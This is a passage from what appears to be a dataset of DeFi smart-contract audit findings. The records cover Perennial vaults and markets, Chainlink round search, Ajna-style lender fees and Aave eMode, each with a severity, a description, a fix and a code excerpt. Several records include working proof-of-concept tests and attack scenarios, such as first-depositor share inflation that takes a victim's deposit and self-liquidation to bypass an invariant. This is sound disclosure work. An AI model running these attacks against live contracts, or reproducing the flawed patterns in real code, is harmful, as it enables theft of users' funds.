'UniswapV2Router: EXPIRED');\\n _;\\n}\\n```\\n\\nThe deadline check ensure that the transaction can be executed on time and the expired transaction revert.чconsider adding deadline check like in the functions like withdraw and deposit and all operations the point is the deadline check\\n```\\nmodifier ensure(uint deadline) {\\n require(deadline >= block.timestamp, 'UniswapV2Router: EXPIRED');\\n _;\\n}\\n```\\nчThe transaction can be pending in mempool for a long and the trading activity is very time senstive. Without deadline check, the trade transaction can be executed in a long time after the user submit the transaction, at that time, the trade can be done in a sub-optimal price, which harms user's position.\\nThe deadline check ensure that the transaction can be executed on time and the expired transaction revert.ч```\\n// **** ADD LIQUIDITY ****\\nfunction _addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin\\n) internal virtual returns (uint amountA, uint amountB) {\\n // create the pair if it doesn't exist yet\\n if (IUniswapV2Factory(factory).getPair(tokenA, tokenB) == address(0)) {\\n IUniswapV2Factory(factory).createPair(tokenA, tokenB);\\n }\\n (uint reserveA, uint reserveB) = UniswapV2Library.getReserves(factory, tokenA, tokenB);\\n if (reserveA == 0 && reserveB == 0) {\\n (amountA, amountB) = (amountADesired, amountBDesired);\\n } else {\\n uint amountBOptimal = UniswapV2Library.quote(amountADesired, reserveA, reserveB);\\n if (amountBOptimal <= amountBDesired) {\\n require(amountBOptimal >= amountBMin, 'UniswapV2Router: INSUFFICIENT_B_AMOUNT');\\n (amountA, amountB) = (amountADesired, amountBOptimal);\\n } else {\\n uint amountAOptimal = UniswapV2Library.quote(amountBDesired, reserveB, reserveA);\\n assert(amountAOptimal <= amountADesired);\\n require(amountAOptimal >= amountAMin, 'UniswapV2Router: INSUFFICIENT_A_AMOUNT');\\n (amountA, amountB) = (amountAOptimal, 
amountBDesired);\\n }\\n }\\n}\\n\\nfunction addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin,\\n address to,\\n uint deadline\\n) external virtual override ensure(deadline) returns (uint amountA, uint amountB, uint liquidity) {\\n (amountA, amountB) = _addLiquidity(tokenA, tokenB, amountADesired, amountBDesired, amountAMin, amountBMin);\\n address pair = UniswapV2Library.pairFor(factory, tokenA, tokenB);\\n TransferHelper.safeTransferFrom(tokenA, msg.sender, pair, amountA);\\n TransferHelper.safeTransferFrom(tokenB, msg.sender, pair, amountB);\\n liquidity = IUniswapV2Pair(pair).mint(to);\\n}\\n```\\n -Lenders lose interests and pay deposit fees due to no slippage controlчmediumчWhen a lender deposits quote tokens below the minimum of LUP(Lowest Utilization Price) and HTP(Highest Threshold Price), the deposits will not earn interest and will also be charged deposit fees, according to docs. When a lender deposits to a bucket, they are vulnerable to pool LUP slippage which might cause them to lose funds due to fee charges against their will.\\nA lender would call `addQuoteToken()` to deposit. 
This function only allows entering expiration time for transaction settlement, but there is no slippage protection.\\n```\\n//Pool.sol\\n function addQuoteToken(\\n uint256 amount_,\\n uint256 index_,\\n uint256 expiry_\\n ) external override nonReentrant returns (uint256 bucketLP_) {\\n _revertAfterExpiry(expiry_);\\n PoolState memory poolState = _accruePoolInterest();\\n // round to token precision\\n amount_ = _roundToScale(amount_, poolState.quoteTokenScale);\\n uint256 newLup;\\n (bucketLP_, newLup) = LenderActions.addQuoteToken(\\n buckets,\\n deposits,\\n poolState,\\n AddQuoteParams({\\n amount: amount_,\\n index: index_\\n })\\n );\\n // rest of code\\n```\\n\\nIn LenderActions.sol, `addQuoteToken()` takes current `DepositsState` in storage and current `poolState_.debt` in storage to calculate spot LUP prior to deposit. And this LUP is compared with user input bucket `index_` to determine if the lender will be punished with deposit fees. The deposit amount is then written to storage.\\n```\\n//LenderActions.sol\\n function addQuoteToken(\\n mapping(uint256 => Bucket) storage buckets_,\\n DepositsState storage deposits_,\\n PoolState calldata poolState_,\\n AddQuoteParams calldata params_\\n ) external returns (uint256 bucketLP_, uint256 lup_) {\\n // rest of code\\n // charge unutilized deposit fee where appropriate\\n |> uint256 lupIndex = Deposits.findIndexOfSum(deposits_, poolState_.debt);\\n bool depositBelowLup = lupIndex != 0 && params_.index > lupIndex;\\n if (depositBelowLup) {\\n addedAmount = Maths.wmul(addedAmount, Maths.WAD - _depositFeeRate(poolState_.rate));\\n }\\n// rest of code\\n Deposits.unscaledAdd(deposits_, params_.index, unscaledAmount);\\n// rest of code\\n```\\n\\nIt should be noted that current `deposits_` and `poolState_.debt` can be different from when the user invoked the transaction, which will result in a different LUP spot price unforeseen by the lender to determine deposit fees. 
Even though lenders can input a reasonable expiration time `expiry_`, this will only prevent stale transactions to be executed and not offer any slippage control.\\nWhen there are many lenders depositing around the same time, LUP spot price can be increased and if the user transaction settles after a whale lender which moves the LUP spot price up significantly, the user might get accidentally punished for depositing below LUP. Or there could also be malicious lenders trying to ensure their transactions settle at a favorable LUP/HTP and front-run the user transaction, in which case the user transaction might still settle after the malicious lender and potentially get charged for fees.чAdd slippage protection in Pool.sol `addQuoteToken()`. A lender can enable slippage protection, which will enable comparing deposit `index_` with `lupIndex` in LenderActions.sol.чLenders might get charged deposit fees due to slippage against their will with or without MEV attacks, lenders might also lose on interest by depositing below HTP.ч```\\n//Pool.sol\\n function addQuoteToken(\\n uint256 amount_,\\n uint256 index_,\\n uint256 expiry_\\n ) external override nonReentrant returns (uint256 bucketLP_) {\\n _revertAfterExpiry(expiry_);\\n PoolState memory poolState = _accruePoolInterest();\\n // round to token precision\\n amount_ = _roundToScale(amount_, poolState.quoteTokenScale);\\n uint256 newLup;\\n (bucketLP_, newLup) = LenderActions.addQuoteToken(\\n buckets,\\n deposits,\\n poolState,\\n AddQuoteParams({\\n amount: amount_,\\n index: index_\\n })\\n );\\n // rest of code\\n```\\n -BalancedVault.sol: loss of funds + global settlement flywheel / user settlement flywheels getting out of syncчhighчWhen an epoch has become \"stale\", the `BalancedVault` will treat any new deposits and redemptions in this epoch as \"pending\". 
This means they won't get processed by the global settlement flywheel in the next epoch but one epoch later than that.\\nDue to the fact that anyone can push a pending deposit or redemption of a user further ahead by making an arbitrarily small deposit in the \"intermediate epoch\" (i.e. the epoch between when the user creates the pending deposit / redemption and the epoch when it is scheduled to be processed by the global settlement flywheel), the user can experience a DOS.\\nWorse than that, by pushing the pending deposit / pending redemption further ahead, the global settlement flywheel and the user settlement flywheel get out of sync.\\nAlso users can experience a loss of funds.\\nSo far so good. The global settlement flywheel and the user settlement flywheel are in sync and will process the pending deposit in epoch `3`.\\nNow here's the issue. A malicious user2 or user1 unknowingly (depending on the specific scenario) calls `deposit` for user1 again in the current epoch `2` once it has become `stale` (it's possible to `deposit` an arbitrarily small amount). By doing so we set `_pendingEpochs[user1] = context.epoch + 1 = 3`, thereby pushing the processing of the `deposit` in the user settlement flywheel one epoch ahead.\\nIt's important to understand that the initial deposit will still be processed in epoch `3` in the global settlement flywheel, it's just being pushed ahead in the user settlement flywheel.\\nThereby the global settlement flywheel and user settlement flywheel are out of sync now.\\nAn example for a loss of funds that can occur as a result of this issue is when the PnL from epoch `3` to epoch `4` is positive. 
Thereby the user1 will get less shares than he is entitled to.\\nSimilarly it is possible to push pending redemptions ahead, thereby the `_totalUnclaimed` amount would be increased by an amount that is different from the amount that `_unclaimed[account]` is increased by.\\nComing back to the case with the pending deposit, I wrote a test that you can add to BalancedVaultMulti.test.ts:\\n```\\nit('pending deposit pushed by 1 epoch causing shares difference', async () => {\\n const smallDeposit = utils.parseEther('1000')\\n const smallestDeposit = utils.parseEther('0.000001')\\n\\n await updateOracleEth() // epoch now stale\\n // make a pending deposit\\n await vault.connect(user).deposit(smallDeposit, user.address)\\n await updateOracleBtc()\\n await vault.sync()\\n\\n await updateOracleEth() // epoch now stale\\n /* \\n user2 deposits for user1, thereby pushing the pending deposit ahead and causing the \\n global settlement flywheel and user settlement flywheel to get out of sync\\n */\\n await vault.connect(user2).deposit(smallestDeposit, user.address)\\n await updateOracleBtc()\\n await vault.sync()\\n\\n await updateOracle()\\n // pending deposit for user1 is now processed in the user settlement flywheel\\n await vault.syncAccount(user.address)\\n\\n const totalSupply = await vault.totalSupply()\\n const balanceUser1 = await vault.balanceOf(user.address)\\n const balanceUser2 = await vault.balanceOf(user2.address)\\n\\n /*\\n totalSupply is bigger than the amount of shares of both users together\\n this is because user1 loses out on some shares that he is entitled to\\n -> loss of funds\\n */\\n console.log(totalSupply);\\n console.log(balanceUser1.add(balanceUser2));\\n\\n})\\n```\\n\\nThe impact that is generated by having one pending deposit that is off by one epoch is small. 
However over time this would evolve into a chaotic situation, where the state of the Vault is significantly corrupted.чMy recommendation is to implement a queue for pending deposits / pending redemptions of a user. Pending deposits / redemptions can then be processed independently (without new pending deposits / redemptions affecting when existing ones are processed).\\nPossibly there is a simpler solution which might involve restricting the ability to make deposits to the user himself and only allowing one pending deposit / redemption to exist at a time.\\nThe solution to implement depends on how flexible the sponsor wants the deposit / redemption functionality to be.чThe biggest impact comes from the global settlement flywheel and user settlement flywheel getting out of sync. As shown above, this can lead to a direct loss of funds for the user (e.g. the amount of shares he gets for a deposit are calculated with the wrong context).\\nApart from the direct impact for a single user, there is a subtler impact which can be more severe in the long term. Important invariants are violated:\\nSum of user balances is equal to the total supply\\nSum of unclaimed user assets is equal to total unclaimed assets\\nThereby the impact is not limited to a single user but affects the calculations for all users.\\nLess important but still noteworthy is that users that deposit into the Vault are partially exposed to PnL in the underlying products. The Vault does not employ a fully delta-neutral strategy. 
Therefore by experiencing a larger delay until the pending deposit / redemption is processed, users incur the risk of negative PnL.ч```\\nit('pending deposit pushed by 1 epoch causing shares difference', async () => {\\n const smallDeposit = utils.parseEther('1000')\\n const smallestDeposit = utils.parseEther('0.000001')\\n\\n await updateOracleEth() // epoch now stale\\n // make a pending deposit\\n await vault.connect(user).deposit(smallDeposit, user.address)\\n await updateOracleBtc()\\n await vault.sync()\\n\\n await updateOracleEth() // epoch now stale\\n /* \\n user2 deposits for user1, thereby pushing the pending deposit ahead and causing the \\n global settlement flywheel and user settlement flywheel to get out of sync\\n */\\n await vault.connect(user2).deposit(smallestDeposit, user.address)\\n await updateOracleBtc()\\n await vault.sync()\\n\\n await updateOracle()\\n // pending deposit for user1 is now processed in the user settlement flywheel\\n await vault.syncAccount(user.address)\\n\\n const totalSupply = await vault.totalSupply()\\n const balanceUser1 = await vault.balanceOf(user.address)\\n const balanceUser2 = await vault.balanceOf(user2.address)\\n\\n /*\\n totalSupply is bigger than the amount of shares of both users together\\n this is because user1 loses out on some shares that he is entitled to\\n -> loss of funds\\n */\\n console.log(totalSupply);\\n console.log(balanceUser1.add(balanceUser2));\\n\\n})\\n```\\n -ChainlinkAggregator: binary search for roundId does not work correctly and Oracle can even end up temporarily DOSedчmediumчWhen a phase switchover occurs, it can be necessary that phases need to be searched for a `roundId` with a timestamp as close as possible but bigger than `targetTimestamp`.\\nFinding the `roundId` with the closest possible timestamp is necessary according to the sponsor to minimize the delay of position changes:\\n\\nThe binary search algorithm is not able to find this best `roundId` which thereby causes 
unintended position changes.\\nAlso it can occur that the `ChainlinkAggregator` library is unable to find a valid `roundId` at all (as opposed to only not finding the \"best\").\\nThis would cause the Oracle to be temporarily DOSed until there are more valid rounds.\\nLet's say in a phase there's only one valid round (roundId=1) and the timestamp for this round is greater than `targetTimestamp`\\nWe would expect the `roundId` that the binary search finds to be `roundId=1`.\\nThe binary search loop is executed with `minRoundId=1` and `maxRoundId=1001`.\\nAll the above conditions can easily occur in reality, they represent the basic scenario under which this algorithm executes.\\n`minRoundId` and `maxRoundId` change like this in the iterations of the loop:\\n```\\nminRoundId=1\\nmaxRoundId=1001\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=501\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=251\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=126\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=63\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=32\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=16\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=8\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=4\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=2\\n\\nNow the loop terminates because\\nminRoundId + 1 !< maxRoundId\\n```\\n\\nSince we assumed that `roundId=2` is invalid, the function returns `0` (maxTimestamp=type(uint256).max):\\nIn the case that `latestRound.roundId` is equal to the `roundId=1` (i.e. same phase and same round id which could not be found) there would be no other valid rounds that the `ChainlinkAggregator` can find which causes a temporary DOS.чI recommend to add a check if `minRoundId` is a valid solution for the binary search. 
If it is, `minRoundId` should be used to return the result instead of maxRoundId:\\n```\\n // If the found timestamp is not greater than target timestamp or no max was found, then the desired round does\\n // not exist in this phase\\n// Remove the line below\\n if (maxTimestamp <= targetTimestamp || maxTimestamp == type(uint256).max) return 0;\\n// Add the line below\\n if ((minTimestamp <= targetTimestamp || minTimestamp == type(uint256).max) && (maxTimestamp <= targetTimestamp || maxTimestamp == type(uint256).max)) return 0;\\n \\n// Add the line below\\n if (minTimestamp > targetTimestamp) {\\n// Add the line below\\n return _aggregatorRoundIdToProxyRoundId(phaseId, uint80(minRoundId));\\n// Add the line below\\n }\\n return _aggregatorRoundIdToProxyRoundId(phaseId, uint80(maxRoundId));\\n }\\n```\\n\\nAfter applying the changes, the binary search only returns `0` if both `minRoundId` and `maxRoundId` are not a valid result.\\nIf this line is passed we know that either of both is valid and we can use `minRoundId` if it is the better result.чAs explained above this would result in sub-optimal and unintended position changes in the best case. In the worst-case the Oracle can be temporarily DOSed, unable to find a valid `roundId`.\\nThis means that users cannot interact with the perennial protocol because the Oracle cannot be synced. 
So they cannot close losing trades which is a loss of funds.ч```\\nminRoundId=1\\nmaxRoundId=1001\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=501\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=251\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=126\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=63\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=32\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=16\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=8\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=4\\n\\n-> \\n\\nminRoundId=1\\nmaxRoundId=2\\n\\nNow the loop terminates because\\nminRoundId + 1 !< maxRoundId\\n```\\n -BalancedVault.sol: Early depositor can manipulate exchange rate and steal fundsчmediumчThe first depositor can mint a very small number of shares, then donate assets to the Vault. Thereby he manipulates the exchange rate and later depositors lose funds due to rounding down in the number of shares they receive.\\nThe currently deployed Vaults already hold funds and will merely be upgraded to V2. However as Perennial expands there will surely be the need for more Vaults which enables this issue to occur.\\nYou can add the following test to `BalancedVaultMulti.test.ts`. Make sure to have the `dsu` variable available in the test since by default this variable is not exposed to the tests.\\nThe test is self-explanatory and contains the necessary comments:\\n```\\nit('exchange rate manipulation', async () => {\\n const smallDeposit = utils.parseEther('1')\\n const smallestDeposit = utils.parseEther('0.000000000000000001')\\n\\n // make a deposit with the attacker. Deposit 1 Wei to mint 1 Wei of shares\\n await vault.connect(user).deposit(smallestDeposit, user.address)\\n await updateOracle();\\n await vault.sync()\\n\\n console.log(await vault.totalSupply());\\n\\n // donating assets to Vault\\n await dsu.connect(user).transfer(vault.address, utils.parseEther('1'))\\n\\n console.log(await vault.totalAssets());\\n\\n // make a deposit with the victim. 
Due to rounding the victim will end up with 0 shares\\n await updateOracle();\\n await vault.sync()\\n await vault.connect(user2).deposit(smallDeposit, user2.address)\\n await updateOracle();\\n await vault.sync()\\n\\n console.log(await vault.totalAssets());\\n console.log(await vault.totalSupply());\\n // the amount of shares the victim receives is rounded down to 0\\n console.log(await vault.balanceOf(user2.address));\\n\\n /*\\n at this point there are 2000000000000000001 Wei of assets in the Vault and only 1 Wei of shares\\n which is owned by the attacker.\\n This means the attacker has stolen all funds from the victim.\\n */\\n })\\n```\\nчThis issue can be mitigated by requiring a minimum deposit of assets. Thereby the attacker cannot manipulate the exchange rate to be so low as to enable this attack.чThe attacker can steal funds from later depositors.ч```\\nit('exchange rate manipulation', async () => {\\n const smallDeposit = utils.parseEther('1')\\n const smallestDeposit = utils.parseEther('0.000000000000000001')\\n\\n // make a deposit with the attacker. Deposit 1 Wei to mint 1 Wei of shares\\n await vault.connect(user).deposit(smallestDeposit, user.address)\\n await updateOracle();\\n await vault.sync()\\n\\n console.log(await vault.totalSupply());\\n\\n // donating assets to Vault\\n await dsu.connect(user).transfer(vault.address, utils.parseEther('1'))\\n\\n console.log(await vault.totalAssets());\\n\\n // make a deposit with the victim. 
Due to rounding the victim will end up with 0 shares\\n await updateOracle();\\n await vault.sync()\\n await vault.connect(user2).deposit(smallDeposit, user2.address)\\n await updateOracle();\\n await vault.sync()\\n\\n console.log(await vault.totalAssets());\\n console.log(await vault.totalSupply());\\n // the amount of shares the victim receives is rounded down to 0\\n console.log(await vault.balanceOf(user2.address));\\n\\n /*\\n at this point there are 2000000000000000001 Wei of assets in the Vault and only 1 Wei of shares\\n which is owned by the attacker.\\n This means the attacker has stolen all funds from the victim.\\n */\\n })\\n```\\n -User would liquidate his account to sidestep `takerInvariant` modifierчmediumчA single user could open a massive maker position, using the maximum leverage possible(and possibly reach the maker limit), and when a lot of takers open take positions, maker would liquidate his position, effectively bypassing the taker invariant and losing nothing apart from position fees. This would cause takers to be charged extremely high funding fees(at the maxRate), and takers that are not actively monitoring their positions will be greatly affected.\\nIn the closeMakeFor function, there is a modifier called `takerInvariant`.\\n```\\nfunction closeMakeFor(\\n address account,\\n UFixed18 amount\\n )\\n public\\n nonReentrant\\n notPaused\\n onlyAccountOrMultiInvoker(account)\\n settleForAccount(account)\\n takerInvariant\\n closeInvariant(account)\\n liquidationInvariant(account)\\n {\\n _closeMake(account, amount);\\n }\\n```\\n\\nThis modifier prevents makers from closing their positions if it would make the global maker open positions to fall below the global taker open positions. A malicious maker can easily sidestep this by liquidating his own account. 
Liquidating an account pays the liquidator a fee from the account's collateral, and then forcefully closes all open maker and taker positions for that account.\\n```\\nfunction closeAll(address account) external onlyCollateral notClosed settleForAccount(account) {\\n AccountPosition storage accountPosition = _positions[account];\\n Position memory p = accountPosition.position.next(_positions[account].pre);\\n\\n // Close all positions\\n _closeMake(account, p.maker);\\n _closeTake(account, p.taker);\\n\\n // Mark liquidation to lock position\\n accountPosition.liquidation = true; \\n }\\n```\\n\\nThis would make the open maker positions to drop significantly below the open taker position, and greatly increase the funding fee and utilization ratio.\\nATTACK SCENARIO\\nA new Product(ETH-Long) is launched on arbitrum with the following configurations:\\n20x max leverage(5% maintenance)\\nmakerFee = 0\\ntakerFee = 0.015\\nliquidationFee = 20%\\nminRate = 4%\\nmaxRate = 120%\\ntargetRate = 12%\\ntargetUtilization = 80%\\nmakerLimit = 4000 Eth\\nETH price = 1750 USD\\nColl Token = USDC\\nmax liquidity(USD) = 4000*1750 = $7,000,000\\nWhale initially supplies 350k USDC of collateral(~200ETH), and opens a maker position of 3000ETH($5.25mn), at 15x leverage.\\nAfter 2 weeks of activity, global open maker position goes up to 3429ETH($6mn), and because fundingFee is low, people are incentivized to open taker positions, so global open taker position gets to 2743ETH($4.8mn) at 80% utilization. Now, rate of fundingFee is 12%\\nNow, Whale should only be able to close up to 686ETH($1.2mn) of his maker position using the `closeMakeFor` function because of the `takerInvariant` modifier.\\nWhale decides to withdraw 87.5k USDC(~50ETH), bringing his total collateral to 262.5k USDC, and his leverage to 20x(which is the max leverage)\\nIf price of ETH temporarily goes up to 1755 USD, totalMaintenance=3000 * 1755 * 5% = $263250. 
Because his totalCollateral is 262500 USDC(which is less than totalMaintenance), his account becomes liquidatable.\\nWhale liquidates his account, he receives liquidationFee*totalMaintenance = 20% * 263250 = 52650USDC, and his maker position of 3000ETH gets closed. Now, he can withdraw his remaining collateral(262500-52650=209850)USDC because he has no open positions.\\nGlobal taker position is now 2743ETH($4.8mn), and global maker position is 429ETH($750k)\\nWhale has succeeded in bypassing the takerInvariant modifier, which was to prevent him from closing his maker position if it would make global maker position less than global taker position.\\nConsequently,\\nFunding fees would now be very high(120%), so the currently open taker positions will be greatly penalized, and takers who are not actively monitoring their position could lose a lot.\\nWhale would want to gain from the high funding fees, so he would open a maker position that would still keep the global maker position less than the global taker position(e.g. collateral of 232750USDC at 15x leverage, open position = ~2000ETH($3.5mn)) so that taker positions will keep getting charged at the funding fee maxRate.чConsider implementing any of these:\\nProtocol should receive a share of liquidation fee: This would disincentivize users from wanting to liquidate their own accounts, and they would want to keep their positions healthy and over-collateralized\\nLet there be a maker limit on each account: In addition to the global maker limit, there should be maker limit for each account which may be capped at 5% of global maker limit. This would decentralize liquidity provisioning.чIssue User would liquidate his account to sidestep `takerInvariant` modifier\\nUser will close his maker position when he shouldn't be allowed to, and it would cause open taker positions to be greatly impacted. 
And those who are not actively monitoring their open taker positions will suffer loss due to high funding fees.ч```\\nfunction closeMakeFor(\\n address account,\\n UFixed18 amount\\n )\\n public\\n nonReentrant\\n notPaused\\n onlyAccountOrMultiInvoker(account)\\n settleForAccount(account)\\n takerInvariant\\n closeInvariant(account)\\n liquidationInvariant(account)\\n {\\n _closeMake(account, amount);\\n }\\n```\\n -Accounts will not be liquidated when they are meant to.чmediumчIn the case that the totalMaintenance*liquidationFee is higher than the account's totalCollateral, liquidators are paid the totalCollateral. I think one of the reasons for this is to avoid the case where liquidating an account would attempt to debit fees that is greater than the collateral balance The problem is that, the value of totalCollateral used as fee is slightly higher value than the current collateral balance, which means that in such cases, attempts to liquidate the account would revert due to underflow errors.\\nHere is the `liquidate` function:\\n```\\nfunction liquidate(\\n address account,\\n IProduct product\\n ) external nonReentrant notPaused isProduct(product) settleForAccount(account, product) {\\n if (product.isLiquidating(account)) revert CollateralAccountLiquidatingError(account);\\n\\n UFixed18 totalMaintenance = product.maintenance(account); maintenance?\\n UFixed18 totalCollateral = collateral(account, product); \\n\\n if (!totalMaintenance.gt(totalCollateral))\\n revert CollateralCantLiquidate(totalMaintenance, totalCollateral);\\n\\n product.closeAll(account);\\n\\n // claim fee\\n UFixed18 liquidationFee = controller().liquidationFee();\\n \\n UFixed18 collateralForFee = UFixed18Lib.max(totalMaintenance, controller().minCollateral()); \\n UFixed18 fee = UFixed18Lib.min(totalCollateral, collateralForFee.mul(liquidationFee)); \\n\\n _products[product].debitAccount(account, fee); \\n token.push(msg.sender, fee);\\n\\n emit Liquidation(account, product, msg.sender, 
fee);\\n }\\n```\\n\\n`fee=min(totalCollateral,collateralForFee*liquidationFee)` But the PROBLEM is, the value of `totalCollateral` is fetched before calling `product.closeAll`, and `product.closeAll` debits the closePosition fee from the collateral balance. So there is an attempt to debit `totalCollateral`, when the current collateral balance of the account is totalCollateral-closePositionFees This allows the following:\\nThere is an ETH-long market with following configs:\\nmaintenance=5%\\nminCollateral=100USDC\\nliquidationFee=20%\\nETH price=$1000\\nUser uses 500USDC to open $10000(10ETH) position\\nPrice of ETH spikes up to $6000\\nRequired maintenance= 60000*5%=$3000 which is higher than account's collateral balance(500USDC), therefore account should be liquidated\\nA watcher attempts to liquidate the account which does the following:\\ntotalCollateral=500USDC\\n`product.closeAll` closes the position and debits a makerFee of 10USDC\\ncurrent collateral balance=490USDC\\ncollateralForFee=totalMaintenance=$3000\\nfee=min(500,3000*20%)=500\\n`_products[product].debitAccount(account,fee)` attempts to subtract 500 from 490 which would revert due to underflow\\naccount does not get liquidated\\nNow, User is not liquidated even when he is using 500USD to control a $60000 position at 120x leverage(whereas, maxLeverage=20x)\\nNOTE: This would happen when the market token's price increases by (1/liquidationFee)x. In the above example, price of ETH increased by 6x (from 1000USD to 6000USD) which is greater than 5(1/20%)ч`totalCollateral` that would be paid to liquidator should be refetched after `product.closeAll` is called to get the current collateral balance after closePositionFees have been debited.чA User's position will not be liquidated even when his collateral balance falls WELL below the required maintenance. 
I believe this is of HIGH impact because this scenario is very likely to happen, and when it does, the protocol will be greatly affected because a lot of users will be trading abnormally high leveraged positions without getting liquidated.ч```\\nfunction liquidate(\\n address account,\\n IProduct product\\n ) external nonReentrant notPaused isProduct(product) settleForAccount(account, product) {\\n if (product.isLiquidating(account)) revert CollateralAccountLiquidatingError(account);\\n\\n UFixed18 totalMaintenance = product.maintenance(account); maintenance?\\n UFixed18 totalCollateral = collateral(account, product); \\n\\n if (!totalMaintenance.gt(totalCollateral))\\n revert CollateralCantLiquidate(totalMaintenance, totalCollateral);\\n\\n product.closeAll(account);\\n\\n // claim fee\\n UFixed18 liquidationFee = controller().liquidationFee();\\n \\n UFixed18 collateralForFee = UFixed18Lib.max(totalMaintenance, controller().minCollateral()); \\n UFixed18 fee = UFixed18Lib.min(totalCollateral, collateralForFee.mul(liquidationFee)); \\n\\n _products[product].debitAccount(account, fee); \\n token.push(msg.sender, fee);\\n\\n emit Liquidation(account, product, msg.sender, fee);\\n }\\n```\\n -`BalancedVault` doesn't consider potential break in one of the marketsчmediumчIn case of critical failure of any of the underlying markets, making it permanently impossible to close position and withdraw collateral all funds deposited to balanced Vault will be lost, including funds deposited to other markets.\\nAs Markets and Vaults on Perennial are intented to be created in a permissionless manner and integrate with external price feeds, it cannot be ruled out that any Market will enter a state of catastrophic failure at a point in the future (i.e. 
oracle used stops functioning and Market admin keys are compromised, so it cannot be changed), resulting in permanent inability to process closing positions and withdrawing collateral.\\n`BalancedVault` does not consider this case, exposing all funds deposited to a multi-market Vault to an increased risk, as it is not implementing a possibility for users to withdraw deposited funds through a partial emergency withdrawal from other markets, even at a price of losing the claim to locked funds in case it becomes available in the future. This risk is not mentioned in the documentation.\\nProof of Concept\\nConsider a Vault with 2 markets: ETH/USD and ARB/USD.\\nAlice deposits to Vault, her funds are split between 2 markets\\nARB/USD market undergoes a fatal failure resulting in `maxAmount` returned from `_maxRedeemAtEpoch` to be 0\\nAlice cannot start withdrawal process as this line in `redeem` reverts:\\n```\\n if (shares.gt(_maxRedeemAtEpoch(context, accountContext, account))) revert BalancedVaultRedemptionLimitExceeded();\\n```\\nчImplement a partial/emergency withdrawal or acknowledge the risk clearly in Vault's documentation.чUsers' funds are exposed to increased risk compared to depositing to each market individually and in case of failure of any of the markets all funds are lost. User has no possibility to consciously cut losses and withdraw funds from Markets other than the failed one.ч```\\n if (shares.gt(_maxRedeemAtEpoch(context, accountContext, account))) revert BalancedVaultRedemptionLimitExceeded();\\n```\\n -eMode implementation is completely brokenчhighчEnabling eMode allows assets of the same class to be borrowed at a much higher LTV. 
The issue is that the current implementation makes the incorrect calls to the Aave V3 pool making so that the pool can never take advantage of this higher LTV.\\nAaveLeverageStrategyExtension.sol#L1095-L1109\\n```\\nfunction _calculateMaxBorrowCollateral(ActionInfo memory _actionInfo, bool _isLever) internal view returns(uint256) {\\n \\n // Retrieve collateral factor and liquidation threshold for the collateral asset in precise units (1e16 = 1%)\\n ( , uint256 maxLtvRaw, uint256 liquidationThresholdRaw, , , , , , ,) = strategy.aaveProtocolDataProvider.getReserveConfigurationData(address(strategy.collateralAsset));\\n\\n // Normalize LTV and liquidation threshold to precise units. LTV is measured in 4 decimals in Aave which is why we must multiply by 1e14\\n // for example ETH has an LTV value of 8000 which represents 80%\\n if (_isLever) {\\n uint256 netBorrowLimit = _actionInfo.collateralValue\\n .preciseMul(maxLtvRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return netBorrowLimit\\n .sub(_actionInfo.borrowValue)\\n .preciseDiv(_actionInfo.collateralPrice);\\n```\\n\\nWhen calculating the max borrow/repay allowed, the contract uses the getReserveConfigurationData subcall to the pool.\\nAaveProtocolDataProvider.sol#L77-L100\\n```\\nfunction getReserveConfigurationData(\\n address asset\\n)\\n external\\n view\\n override\\n returns (\\n // rest of code\\n )\\n{\\n DataTypes.ReserveConfigurationMap memory configuration = IPool(ADDRESSES_PROVIDER.getPool())\\n .getConfiguration(asset);\\n\\n (ltv, liquidationThreshold, liquidationBonus, decimals, reserveFactor, ) = configuration\\n .getParams();\\n```\\n\\nThe issue with using getReserveConfigurationData is that it always returns the default settings of the pool. It never returns the adjusted eMode settings. 
This means that no matter the eMode status of the set token, it will never be able to borrow to that limit due to calling the incorrect function.\\nIt is also worth considering that the set token as well as other integrated modules configurations/settings would assume this higher LTV. Due to this mismatch, the set token would almost guaranteed be misconfigured which would lead to highly dangerous/erratic behavior from both the set and it's integrated modules. Due to this I believe that a high severity is appropriate.чPull the adjusted eMode settings rather than the base pool settingsчUsage of eMode, a core function of the contracts, is completely unusable causing erratic/dangerous behaviorч```\\nfunction _calculateMaxBorrowCollateral(ActionInfo memory _actionInfo, bool _isLever) internal view returns(uint256) {\\n \\n // Retrieve collateral factor and liquidation threshold for the collateral asset in precise units (1e16 = 1%)\\n ( , uint256 maxLtvRaw, uint256 liquidationThresholdRaw, , , , , , ,) = strategy.aaveProtocolDataProvider.getReserveConfigurationData(address(strategy.collateralAsset));\\n\\n // Normalize LTV and liquidation threshold to precise units. LTV is measured in 4 decimals in Aave which is why we must multiply by 1e14\\n // for example ETH has an LTV value of 8000 which represents 80%\\n if (_isLever) {\\n uint256 netBorrowLimit = _actionInfo.collateralValue\\n .preciseMul(maxLtvRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return netBorrowLimit\\n .sub(_actionInfo.borrowValue)\\n .preciseDiv(_actionInfo.collateralPrice);\\n```\\n -_calculateMaxBorrowCollateral calculates repay incorrectly and can lead to set token liquidationчhighчWhen calculating the amount to repay, `_calculateMaxBorrowCollateral` incorrectly applies `unutilizedLeveragePercentage` when calculating `netRepayLimit`. 
